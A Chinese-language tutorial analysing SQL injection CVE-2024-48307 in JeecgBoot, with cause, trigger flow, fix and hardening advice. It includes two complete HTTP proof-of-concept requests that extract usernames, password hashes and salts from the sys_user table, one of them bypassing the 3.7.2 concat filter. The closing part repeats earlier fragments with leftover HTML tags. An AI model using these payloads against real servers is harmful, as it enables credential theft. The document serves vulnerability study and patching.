JeecgBoot SQL注入漏洞分析(CVE-2024-48307) 教学文档<\/h1>

一、漏洞概述<\/h2>
JeecgBoot是一个Java低代码平台，在v3.7.1及以下版本中存在SQL注入漏洞(CVE-2024-48307)。该漏洞位于`\/jeecg-boot\/drag\/onlDragDatasetHead\/getTotalData<\/code>接口，由于未对用户输入进行充分过滤，导致攻击者可以构造恶意SQL语句获取数据库敏感信息。<\/p>`

二、影响范围<\/h2>

受影响版本：org.jeecgframework.boot:jeecg-boot-parent < 3.7.1<\/code><\/li>
修复版本：3.7.2及以上<\/li>
<\/ul>
三、漏洞分析<\/h2>
1. 漏洞位置<\/h3>
漏洞路由：\/jeecg-boot\/drag\/onlDragDatasetHead\/getTotalData<\/code><\/p>
相关代码文件：<\/p>

jimureport-dashboard-spring-boot-starter-1.8.1-beta.jar!\org\jeecg\modules\drag\b\f.class<\/code><\/li>
org.jeecg.modules.drag.service.a.d#getTotalData<\/code><\/li>
org.jeecg.modules.drag.service.a.i<\/code><\/li>
<\/ul>
2. 漏洞成因<\/h3>

权限配置问题<\/strong>：Shiro配置中该接口无需授权即可访问<\/li>
输入验证缺失<\/strong>：用户可控参数直接拼接至SQL语句<\/li>
FreeMarker模板注入<\/strong>：使用FreeMarker模板生成SQL查询语句时未对用户输入进行过滤<\/li>
<\/ol>
3. 漏洞触发流程<\/h3>

请求到达\/jeecg-boot\/drag\/onlDragDatasetHead\/getTotalData<\/code>接口<\/li>
检查compName<\/code>不等于"JPivotTable"<\/li>
调用onlDragDatasetHeadService.getTotalData()<\/code>方法<\/li>
检查请求头中config.formtype<\/code>不等于"design"<\/li>
进入handleOnlineForm<\/code>方法处理用户输入<\/li>
通过onlDragDatasourceDao.selectListBySql<\/code>执行SQL查询<\/li>
使用FreeMarker模板动态生成SQL语句，用户输入直接拼接<\/li>
<\/ol>
四、漏洞利用<\/h2>
1. 环境搭建<\/h3>
参考官方文档搭建环境：https:\/\/help.jeecg.com\/java\/setup\/idea\/startup.html<\/p>
2. 原始PoC<\/h3>
POST<\/span> \/jeecg-boot\/drag\/onlDragDatasetHead\/getTotalData HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:12345<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/127.0.6533.100 Safari\/537.36<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate, br<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>Content-Length:<\/span> 326<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>  "tableName"<\/span>: "sys_user"<\/span>, 
<\/span><\/span>  "compName"<\/span>: "test"<\/span>, 
<\/span><\/span>  "condition"<\/span>: {
<\/span><\/span>    "filter"<\/span>: {
<\/span><\/span>      "config"<\/span>: {
<\/span><\/span>        "assistValue"<\/span>: [], 
<\/span><\/span>        "assistType"<\/span>: [], 
<\/span><\/span>        "name"<\/span>: [
<\/span><\/span>          {
<\/span><\/span>            "fieldName"<\/span>: "concat(username,0x3a,password,0x3a,salt)"<\/span>, 
<\/span><\/span>            "fieldType"<\/span>: "string"<\/span>
<\/span><\/span>          }, 
<\/span><\/span>          {
<\/span><\/span>            "fieldName"<\/span>: "id"<\/span>, 
<\/span><\/span>            "fieldType"<\/span>: "string"<\/span>
<\/span><\/span>          }
<\/span><\/span>        ], 
<\/span><\/span>        "value"<\/span>: [
<\/span><\/span>          {
<\/span><\/span>            "fieldName"<\/span>: "id"<\/span>, 
<\/span><\/span>            "fieldType"<\/span>: "string"<\/span>
<\/span><\/span>          }
<\/span><\/span>        ], 
<\/span><\/span>        "type"<\/span>: []
<\/span><\/span>      }
<\/span><\/span>    }
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 修复后绕过PoC<\/h3>
在3.7.2版本中检测了concat<\/code>函数，可以构造不含concat<\/code>的PoC：<\/p>
POST<\/span> \/jeecg-boot\/drag\/onlDragDatasetHead\/getTotalData HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:12346<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/127.0.6533.100 Safari\/537.36<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate, br<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>Content-Length:<\/span> 308<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>  "tableName"<\/span>: "sys_user"<\/span>, 
<\/span><\/span>  "compName"<\/span>: "test"<\/span>, 
<\/span><\/span>  "condition"<\/span>: {
<\/span><\/span>    "filter"<\/span>: {
<\/span><\/span>      "config"<\/span>: {
<\/span><\/span>        "assistValue"<\/span>: [], 
<\/span><\/span>        "assistType"<\/span>: [], 
<\/span><\/span>        "name"<\/span>: [
<\/span><\/span>          {
<\/span><\/span>            "fieldName"<\/span>: "username,password,salt"<\/span>, 
<\/span><\/span>            "fieldType"<\/span>: "string"<\/span>
<\/span><\/span>          }, 
<\/span><\/span>          {
<\/span><\/span>            "fieldName"<\/span>: "id"<\/span>, 
<\/span><\/span>            "fieldType"<\/span>: "string"<\/span>
<\/span><\/span>          }
<\/span><\/span>        ], 
<\/span><\/span>        "value"<\/span>: [
<\/span><\/span>          {
<\/span><\/span>            "fieldName"<\/span>: "id"<\/span>, 
<\/span><\/span>            "fieldType"<\/span>: "string"<\/span>
<\/span><\/span>          }
<\/span><\/span>        ], 
<\/span><\/span>        "type"<\/span>: []
<\/span><\/span>      }
<\/span><\/span>    }
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>五、漏洞修复<\/h2>
1. 修复措施<\/h3>
在3.7.2版本中，通过org.jeecg.modules.drag.service.a.j#handleOnlineForm<\/code>中的c.a()<\/code>方法对concat<\/code>等敏感函数进行了检测。<\/p>
2. 修复验证<\/h3>
尝试使用原始PoC会触发检测机制，返回异常。<\/p>
六、安全建议<\/h2>

升级至JeecgBoot 3.7.2或更高版本<\/li>
对所有用户输入进行严格的过滤和验证<\/li>
使用预编译语句(PreparedStatement)代替动态SQL拼接<\/li>
实施最小权限原则，限制数据库账户权限<\/li>
对敏感接口增加身份验证和授权检查<\/li>
定期进行安全审计和漏洞扫描<\/li>
<\/ol>
七、技术要点总结<\/h2>

FreeMarker模板注入<\/strong>：漏洞利用FreeMarker模板动态生成SQL语句的特性<\/li>
反射检测<\/strong>：修复版本通过反射调用检测方法识别恶意输入<\/li>
SQL注入变种<\/strong>：不同于传统SQL注入，该漏洞通过API参数注入<\/li>
防御绕过<\/strong>：通过修改payload结构可以绕过简单关键词检测<\/li>
<\/ol>
八、参考链接<\/h2>

JeecgBoot官方文档：https:\/\/help.jeecg.com<\/li>
先知社区原文：https:\/\/xz.aliyun.com\/t\/1824226141702051<\/li>
<\/ol>

JeecgBoot SQL注入漏洞分析(CVE-2024-48307) 教学文档<\/h1>

三、漏洞分析<\/h2>

四、漏洞利用<\/h2>

1. 环境搭建<\/h3> 参考官方文档搭建环境：https:\/\/help.jeecg.com\/java\/setup\/idea\/startup.html<\/p>

五、漏洞修复<\/h2>

1. 修复措施<\/h3> 在3.7.2版本中，通过org.jeecg.modules.drag.service.a.j#handleOnlineForm<\/code>中的c.a()<\/code>方法对concat<\/code>等敏感函数进行了检测。<\/p>

八、参考链接<\/h2> JeecgBoot官方文档：https:\/\/help.jeecg.com<\/li> 先知社区原文：https:\/\/xz.aliyun.com\/t\/1824226141702051<\/li> <\/ol>

1. 环境搭建<\/h3>
参考官方文档搭建环境：https:\/\/help.jeecg.com\/java\/setup\/idea\/startup.html<\/p>

1. 修复措施<\/h3>
在3.7.2版本中，通过`org.jeecg.modules.drag.service.a.j#handleOnlineForm<\/code>中的c.a()<\/code>方法对concat<\/code>等敏感函数进行了检测。<\/p>`

八、参考链接<\/h2>

JeecgBoot官方文档：https:\/\/help.jeecg.com<\/li>
先知社区原文：https:\/\/xz.aliyun.com\/t\/1824226141702051<\/li> <\/ol>